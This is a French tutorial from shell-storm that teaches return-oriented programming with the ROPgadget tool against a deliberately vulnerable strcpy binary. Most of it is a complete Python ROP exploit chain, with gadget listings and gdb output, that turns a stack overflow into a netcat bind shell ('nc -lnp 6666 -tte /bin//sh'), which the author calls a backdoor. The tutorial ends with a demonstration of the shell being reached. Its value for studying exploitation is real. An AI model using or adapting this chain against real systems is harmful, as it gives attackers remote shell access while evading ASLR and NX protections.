[French] How to make backdoor with Return Oriented Programming and ROPgadget tool?
Title: [French] How to make backdoor with Return Oriented Programming & ROPgadget tool ?
Language: French
Author: Jonathan Salwan - twitter: @shell_storm
Date 2011-04-13
Original version: http://howto.shell-storm.org/files/howto-8.php
I - Introduction
-----------------
Depuis quelques années, l'exploitation des failles applicatives, en particulier des déborde-
ments de tampons, est rendue de plus en plus difficile par les protections mises en place
par les systèmes d'exploitation.
En particulier, il est de plus en plus rare de pouvoir exécuter du code arbitraire sur la
pile. Il existe des techniques permettant de contourner NX mais ces dernières sont inutiles
si les fonctions de la libc sont protegées par l'ASCII-ARMOR.
Cependant, il existe une technique d'attaque qui permet de passer outre toutes ces
protections. Cette technique s'appelle le ROP (Return Oriented Programming).
Ce type d'attaque qui est extrêmement "lourde" à réaliser, consite à enchaîner des suites
d'instructions qu'on nomment "gadget" pour pouvoir modifier l'état des registres et exécuter
un appel système ou l'exécution d'une autre fonction.
Généralement, le ROP est utilisé pour faire appel à execve() mais ici, dans notre cas, nous
allons essayer de constituer un execve de ce type:
#include <stdio.h>
#include <unistd.h>
int main()
{
char *env[1] = {NULL};
char *arguments[7]= { "/usr/bin//nc",
"-lnp",
"6666",
"-tte",
"/bin//sh",
NULL
};
execve("/usr/bin/nc", arguments, env);
}
Tout d'abord, pour pouvoir reproduire l'appel system execve() nous devons connaître sa
convention.
On est sur un système Linux x86 32 bits:
----------------------------------------
jonathan@ArchLinux [/] $ cat /usr/include/asm/unistd_32.h | grep execve
#define __NR_execve 11
jonathan@ArchLinux [/] $
EAX = 11
EBX = "/usr/bin/nc" (char *)
ECX = arguments (char **)
EDX = env (char **)
II - Comment faire pour trouver des gadgets ?
---------------------------------------------
C'est ici que notre tool rentre en jeux. ROPgadget est un tool permettant de trouver des
gadgets potentiellement utilisables pour faire du ROP, vous pouvez aussi rajouter vos
propres gadgets.
ROPgadget est disponible à cette adresse http://www.shell-storm.org/project/ROPgadget/
Prenons comme exemple le fameux binaire que tout le monde utilise pour faire ses tests. Ici,
le binaire sera compilé en static pour pouvoir avoir un grande plage de gadgets.
#include <string.h>
int main(int argc, char **argv)
{
char buff[32];
if (argc >= 2)
strcpy(buff, argv[1]);
return (0);
}
Utilisons maintenant ROPgadget pour connaître les adresses de nos gadgets.
jonathan@ArchLinux [rop] $ ROPgadget -g main
Header informations
============================================================
phoff 0x00000034
shoff 0x0007de7c
phnum 0x00000005 (5)
shnum 0x0000001a (26)
phentsize 0x00000020
shstrndx 0x00000017
entry 0x08048130
LOAD vaddr 0x08048000
LOAD offset 0x00000000
Gadgets informations
============================================================
0x080481c7: pop %ebx | pop %ebp | ret
0x080481c8: pop %ebp | ret
0x08048224: call *%eax
0x0804847e: mov %ebp,%esp | pop %ebp | ret
0x0804868f: int $0x80
0x0804874b: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x08048b43: mov %edx,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x08048b43: mov %edx,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x08049241: pop %ebx | pop %esi | pop %ebp | ret
0x0804a26b: mov %edi,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x0804b6a5: mov %esi,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x0804c7ab: xor %eax,%eax | pop %ebx | pop %ebp | ret
0x0804d00e: xor %eax,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x0804dafd: mov %ebx,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x0804f1e9: xor %eax,%eax | pop %ebx | ret
0x0804f70c: inc %eax | pop %edi | ret
0x080505b8: pop %esi | pop %ebx | pop %edx | ret
0x080505e0: pop %edx | pop %ecx | pop %ebx | ret
0x08056e94: xor %eax,%eax | leave | ret
0x08057dc0: mov %ecx,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x08057e91: mov %ebx,%eax | pop %ebx | pop %esi | pop %ebp | ret
0x080632a8: mov %ecx,(%ebx) | add $0x8,%esp | pop %ebx | pop %esi | pop %ebp | ret
0x080635d5: mov %ecx,(%edx) | add $0x8,%esp | pop %ebx | pop %ebp | ret
0x080636ef: add %ebx,%eax | pop %ebx | pop %ebp | ret
0x08064c51: xor %eax,%eax | mov %esp, %ebp | pop %ebp | ret
0x08066a1d: mov %ebx,%eax | pop %ebx | pop %ebp | ret
0x08068f82: mov %eax,(%ecx) | pop %ebp | ret
0x08069cda: xor %eax,%eax | pop %edi | ret
0x08069d24: xor %eax,%eax | ret
0x08069fa6: sub %ebx,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
0x0806a8e7: mov %eax,%edi | mov %edi, %eax | pop %edi | pop %ebp | ret
0x0806ad27: inc %eax | pop %edi | pop %esi | ret
0x0806adcd: inc %eax | inc %eax | inc %eax | ret
0x0806adce: inc %eax | inc %eax | ret
0x0806adcf: inc %eax | ret
0x0806fd96: mov (%edx),%eax | mov (%esp), %ebx | mov %ebp,%esp | pop %ebp | ret
0x08079531: mov %eax,(%edx) | ret
0x08084c91: sub $0x1,%eax | pop %ebx | pop %esi | pop %ebp | ret
0x080850b8: mov %eax,(%edi) | pop %eax | pop %ebx | pop %esi | pop %edi | ret
0x080850ba: pop %eax | pop %ebx | pop %esi | pop %edi | ret
0x080850c1: mov %ebx,(%edi) | pop %ebx | pop %esi | pop %edi | ret
0x080a71ac: pop %ecx | pop %ebx | leave | ret
Total gadgets: 42/46
jonathan@ArchLinux [rop] $
Comme vous pouvez le remarquer, ces gadgets sont situés dans la section .text d'un binaire
ELF et donc ne sont pas influençables par l'ASLR ni NX.
Nous n'avons, bien sûr, pas besoin de tous ces gadgets, seulement 6 ou 7 nous seront utiles.
Nous aurons besoin de:
- @.data (l'@ de la section .data pour placer des données)
- int $0x80 (pour pouvoir exécuter notre payload)
- mov %eax,(%ecx) | pop %ebp | ret (pour placer eax dans un buffer)
- inc %eax | ret (pour incrémenter eax jusqu'à 11)
- pop %edx | pop %ecx | pop %ebx | ret (pour poper des adresses)
- pop %eax | pop %ebx | pop %esi | pop %edi | ret (ici juste le pop %eax nous sera utile)
- xor %eax,%eax | ret (pour mettre eax à zero)
III - Schéma d'exploitation et fonctionnement du ROP
----------------------------------------------------
Imaginons les gadgets suivants:
- xor %eax,%eax; ret 0x08041111
- inc %eax; ret 0x08042222
- pop %ebx; pop %ecx; ret 0x08043333
Avant le débordement de tampon
l'état de vos registres sont les
suivants: %eax 0xbfffff53
%ebx 0x080482a3
%ecx 0x13
L'objectif est de mettre l'état
des registres suivants: %eax 0x4
%ebx 0x41424344
%ecx 0x44434241
Votre payload est le suivant:
[NOP X size][SEBP][SEIP]
[0x90 xsize][0x41414141][0x08041111][0x08042222][0x08042222]
[0x08042222][0x08042222][0x08043333][0x41424344][0x44434241]
STACK
+---------+
0xbfffe51c: 0x08048d70 0xbfffe530 0xbfffe9a2 0x00000000
0xbfffe52c: 0x00000000 0x63756f74 0x616c2068 0x69767473
+------- Adresse de votre tableau (tab[0])
v
0xbfffe53c: 0x5f746973 0x90909020 0x90909090 0x90909090
0xbfffe54c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffe55c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffe56c: 0x90909090 0x90909090 0x90909090 0x90909090
+----------+
| .text +
+----------+
+----------------------1--------------->|0x08041111| xor %eax,%eax
| +------------2---------------<|0x08041113| ret
| | |..........|
| | +---------------1--------->|0x08042222| inc %eax
| | | +-----2---------<|0x08042223| ret
| | | | |..........|
Saved ebp ----+ | | | |
v ^ v ^ v
0xbfffe57c: 0x90909090 0x08041111 0x08042222 0x08042222
0xbfffe58c: 0x08042222 0x08042222
+----------+
| .text +
+----------+
+--------------------------------------------1------>|0x08043333|
| +-------------------------------2------<|0x08043333| pop %ebx
| | +------------------3------<|0x08043334| pop %ecx
| | | +------4------<|0x08043335| ret
| P P | |..........|
| O O |
| P P |
| | | |
^ v v v
0xbfffe594: 0x08043333 0x41424344 0x44434241
Tout le schéma ci-dessus est un exemple à titre démonstratif.
Passons à l'exploit pour le binaire "main":
#!/usr/bin/env python2
from struct import pack
EDAX0 = pack("<I", 0x08050a88)
STACK = pack("<I", 0x080c6961) # .data 0x740 0x80c6620
INT80 = pack("<I", 0x0804868f) # int $0x80
MOVISTACK = pack("<I", 0x08068f82) # mov %eax,(%ecx) | pop %ebp | ret
INCEAX = pack("<I", 0x0806adcf) # inc %eax | ret
POPALL = pack("<I", 0x080505e0) # pop %edx | pop %ecx | pop %ebx | ret
POPEAX = pack("<I", 0x080850ba) # pop %eax | pop %ebx | pop %esi | pop %edi | ret
XOREAX = pack("<I", 0x08069d24) # xor %eax,%eax | ret
DUMMY = pack("<I", 0x42424242) # padding
buff = "\x42" * 32
buff += "BBBB"
buff += POPALL # c'est via %ecx qu'on va construire notre stack
buff += DUMMY # padding (pas d'importance)
buff += STACK # ecx contiendra l'@ de notre stack
buff += DUMMY # padding (pas d'importance)
buff += POPEAX # Permet de mettre du contenu dans une adresse
buff += "/usr" # on place "/usr" dans eax
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += MOVISTACK # place "/usr" à l'adresse de notre STACK
buff += DUMMY # padding (pas d'importance)
buff += POPALL
buff += DUMMY # padding (pas d'importance)
buff += pack("<I", 0x080c6961 + 4) # on change notre STACK pour pointer après "/usr"
buff += DUMMY # padding (pas d'importance)
buff += POPEAX # on applique la même chose pour "/bin"
buff += "/bin"
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += MOVISTACK # on place "/bin" après "/usr"
buff += DUMMY # padding (pas d'importance)
buff += POPALL
buff += DUMMY # padding (pas d'importance)
buff += pack("<I", 0x080c6961 + 8) # on change notre STACK pour pointer après "/usr/bin"
buff += DUMMY # padding (pas d'importance)
buff += POPEAX # on applique la même chose pour "//nc"
buff += "//nc"
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += MOVISTACK # on place "//nc" après "/usr/bin"
buff += DUMMY # padding (pas d'importance)
buff += POPALL
buff += DUMMY # padding (pas d'importance)
buff += pack("<I", 0x080c6961 + 13) # on change notre STACK pour pointer après "/usr/bin//nc"+1
# pour laisser un \0 entre les arguments
buff += DUMMY # padding (pas d'importance)
# on repète l'opération pour chaque argument
buff += POPEAX
buff += "-lnp"
buff += DUMMY
buff += DUMMY
buff += DUMMY
buff += MOVISTACK
buff += DUMMY
buff += POPALL
buff += DUMMY
buff += pack("<I", 0x080c6961 + 18)
buff += DUMMY
buff += POPEAX
buff += "6666"
buff += DUMMY
buff += DUMMY
buff += DUMMY
buff += MOVISTACK
buff += DUMMY
buff += POPALL
buff += DUMMY
buff += pack("<I", 0x080c6961 + 23)
buff += DUMMY
buff += POPEAX
buff += "-tte"
buff += DUMMY
buff += DUMMY
buff += DUMMY
buff += MOVISTACK
buff += DUMMY
buff += POPALL
buff += DUMMY
buff += pack("<I", 0x080c6961 + 28)
buff += DUMMY
buff += POPEAX
buff += "/bin"
buff += DUMMY
buff += DUMMY
buff += DUMMY
buff += MOVISTACK
buff += DUMMY
buff += POPALL
buff += DUMMY
buff += pack("<I", 0x080c6961 + 32)
buff += DUMMY
buff += POPEAX
buff += "//sh"
buff += DUMMY
buff += DUMMY
buff += DUMMY
buff += MOVISTACK
buff += DUMMY
#
# Nous avons actuellement notre liste d'élements séparés par des \0
# Maintenant il nous faut construire notre de char **
#
# 0x80c6961 <_IO_wide_data_1+1>: "/usr/bin//nc"
# 0x80c696e <_IO_wide_data_1+14>: "-lnp"
# 0x80c6973 <_IO_wide_data_1+19>: "6666"
# 0x80c6978 <_IO_wide_data_1+24>: "-tte"
# 0x80c697d <_IO_wide_data_1+29>: "/bin//sh"
# 0x80c6986 <_IO_wide_data_1+38>: ""
#
buff += POPALL
buff += DUMMY # padding (pas d'importance)
buff += pack("<I", 0x080c6961 + 60) # l'adresse de notre STACK
buff += DUMMY # padding (pas d'importance)
buff += POPEAX
buff += pack("<I", 0x080c6961) # l'@ de "/usr/bin//nc"
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += MOVISTACK # on place l'@ de "/usr/bin//nc" sur notre STACK
buff += DUMMY # padding (pas d'importance)
buff += POPALL
buff += DUMMY # padding (pas d'importance)
buff += pack("<I", 0x080c6961 + 64) # on décale notre STACK de + 4 pour le pointeur du 2ème argument
buff += DUMMY # padding (pas d'importance)
buff += POPEAX
buff += pack("<I", 0x080c696e) # l'@ de "-lnp"
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += MOVISTACK # on place l'@ de "-lnp" sur notre STACK
buff += DUMMY # padding (pas d'importance)
buff += POPALL
buff += DUMMY # padding (pas d'importance)
buff += pack("<I", 0x080c6961 + 68) # on décale notre STACK de + 4 pour le pointeur du 3ème argument
buff += DUMMY # padding (pas d'importance)
buff += POPEAX
buff += pack("<I", 0x080c6973) # l'@ de "6666"
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += MOVISTACK # on place l'@ de "6666" sur notre STACK
buff += DUMMY # padding (pas d'importance)
buff += POPALL
buff += DUMMY # padding (pas d'importance)
buff += pack("<I", 0x080c6961 + 72) # on décale notre STACK de + 4 pour le pointeur du 4ème argument
buff += DUMMY # padding (pas d'importance)
buff += POPEAX
buff += pack("<I", 0x80c6978) # l'@ de "-tte"
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += MOVISTACK # on place l'@ de "-tte" sur notre STACK
buff += DUMMY # padding (pas d'importance)
buff += POPALL
buff += DUMMY # padding (pas d'importance)
buff += pack("<I", 0x080c6961 + 76) # on décale notre STACK de + 4 pour le pointeur du 5ème argument
buff += DUMMY # padding (pas d'importance)
buff += POPEAX
buff += pack("<I", 0x80c697d) # l'@ de "/bin//sh"
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += DUMMY # padding (pas d'importance)
buff += MOVISTACK # on place l'@ de "/bin//sh" sur notre STACK
buff += DUMMY # padding (pas d'importance)
#
# Maintenant il nous faut mettre en place eax pour qu'il contienne
# l'adresse du syscall execve
# execve = 0xb
#
buff += XOREAX # on met eax à zero
buff += INCEAX * 11 # on l'incrémente 11 fois pour qu'il puisse avoir la valeur 0xb
buff += POPALL # on fait un dernier pop pour placer les adresses qu'on a construites
buff += pack("<I", 0x080c6961 + 48) # edx char *env
buff += pack("<I", 0x080c6961 + 60) # ecx char **arguments
buff += pack("<I", 0x080c6961) # ebx "/usr/bin//nc"
buff += INT80 # on exécute
print buff
Au moment de notre "int 0x80" notre stack et nos registres sont constitué comme ceci:
EAX: 0000000B EBX: 080C6961 ECX: 080C699D
EDX: 080C6991 ESI: 42424242 EDI: 42424242
EBP: 42424242 ESP: BFFFF82C EIP: 42424242
gdb$ x/6s $ebx
0x80c6961 <_IO_wide_data_1+1>: "/usr/bin//nc"
0x80c696e <_IO_wide_data_1+14>: "-lnp"
0x80c6973 <_IO_wide_data_1+19>: "6666"
0x80c6978 <_IO_wide_data_1+24>: "-tte"
0x80c697d <_IO_wide_data_1+29>: "/bin//sh"
0x80c6986 <_IO_wide_data_1+38>: ""
0x80c699d <_IO_wide_data_1+61>: 0x080c6961
0x80c69a1 <_IO_wide_data_1+65>: 0x080c696e
0x80c69a5 <_IO_wide_data_1+69>: 0x080c6973
0x80c69a9 <_IO_wide_data_1+73>: 0x080c6978
0x80c69ad <_IO_wide_data_1+77>: 0x080c697d
0x80c69b1 <_IO_wide_data_1+81>: 0x00000000
jonathan@ArchLinux [rop] $ ./main $(./exploit.py)
jonathan@ArchLinux [/] $ netcat 127.0.0.1 6666
ls
exploit.py
main
main.c
Et voila, l'exploit bypasse l'ASLR, NX et l'ASCII-ARMOR et attend une connexion.
Le ROP est extrêmement puissant et stable, mais comme vous avez pu le constater,
il est aussi assez lourd à mettre en place.
IV - Références
---------------
[x] - http://www.shell-storm.org
[1] - http://www.shell-storm.org/project/ROPgadget/
[2] - http://www.shell-storm.org/papers/files/725.pdf